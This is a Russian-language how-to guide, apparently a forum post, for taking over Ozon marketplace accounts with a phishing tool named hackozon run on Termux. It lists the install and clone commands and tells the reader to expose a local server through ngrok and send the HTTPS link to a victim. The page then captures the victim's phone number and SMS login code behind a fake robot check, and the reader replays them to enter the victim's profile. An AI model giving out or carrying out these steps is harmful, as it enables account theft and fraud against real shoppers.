Утилита для получения доступа к профилям Озон.
Работает как фишинг, но работает без палебно.
Для работы с ним нам необходимо иметь:
PHP
PYTHON
|_Requests
NGROK
У кого их нет - пишем:
pkg install php
pkg install python
pip install requests
git clone https://github.com/tchelospy/termux-ngrok
cd termux-ngrok
./termux-ngrok.sh
Теперь у нас есть необходимости и можно приступать к установке самой утилиты:
git clone https://github.com/termux-lab/hackozon.git
cd hackozon
python3 hackozon.py
Затем пишем необходимый порт.
Например:
8080
2000
3000
3333
и т.п
Жмём Enter и видим как запускается сервер.
Далее открываем новую сессию и запускаем ngrok.
ngrok http 8080
Вместо 8080 пишем тот порт который указали при запуске сервера в первой сессии. Если вы там указали 8080, то указываем и в Ngrok.
Далее копируем ссылку с протоколом HTTPS.
Это и будет ссылка которую необходимо скинуть жертве.
Перейдя к первой сессии мы сможем наблюдать за запросами.
За ранее открываем веб версию Озона и жмём войти. Наблюдая за запросами в первой сессии, у нас появится номер телефона жертвы и код.
Копируем номер и вводим в поле авторизации и жмём войти. Затем когда нас попросят ввести код, мы вводим код который так же был получен в первой сессии после номера телефона.
Вводим код и мы в профиле жертвы.
Это мы рассмотрели со стороны атакующего. А что же на стороне жертвы произошло?
После того как жертва перешла по ссылке, его попросят подтвердить, что пользователь не является роботом и ввести номер телефона. После того как жертва напишет номер телефона, ему необходимо будет ввести код который придет ему как СМС и только тогда пользователь подтвердит, что не является роботом + не заметит как как-то другой по ту сторону сайта получил эти данные и оказался у него в профиле. По описанию это чуть кажется сложнее, но на практике это легче лёгкого.